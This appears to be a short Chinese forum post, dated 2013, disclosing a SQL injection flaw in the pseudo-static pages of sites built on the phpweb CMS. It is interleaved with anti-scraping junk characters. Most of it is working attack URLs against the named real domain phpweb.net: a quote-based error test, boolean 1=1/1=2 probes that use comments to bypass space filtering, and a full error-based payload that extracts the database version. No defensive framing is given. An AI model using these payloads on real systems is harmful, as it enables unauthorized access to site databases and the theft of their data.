phpweb所有的整站程序伪静态页面都存在sql注入1 A$ |- d, C. k! [+ {; \' I
0 m: L) s/ Z) N5 F& @# n主站:http://phpweb.net/
) A$ X( P+ u' }# `7 X1 W加’检测:
* [2 t6 E# I1 @ m& e3 {( i 2 o" M* W7 \3 ? S; Z5 {
http://www.phpweb.net/down/html/?772′.html& F1 `0 }% I2 `) H
. [1 m1 X2 L2 Y6 l `. f
出错
/ h Z# _: K% B0 N; x存在注入。
1 s% }' W+ o6 G/ n/ n% J, z不能用空格,只能用/*罗
+ P- u6 R3 \# b! F2 Vhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常! [8 t A+ x* ?- h/ P0 ~$ p
% F8 l) f) _9 d. Z, s8 W
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.6 s _& Q4 e! N$ V0 L2 Y
爆数据库版本:+ `5 {* B/ ^2 P0 `% u( B3 a+ M6 |- S
; A2 i( ^+ O6 P7 |3 k" n
?/ h, b6 ^6 t0 p/ B5 h$ l
1+ V! b# Y; Z, }5 g5 X7 o ?3 E
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
3 y _$ k2 K5 Z9 Q更新日期: 2013-01-03 13:39:50 2 G8 ^( k# i- b
|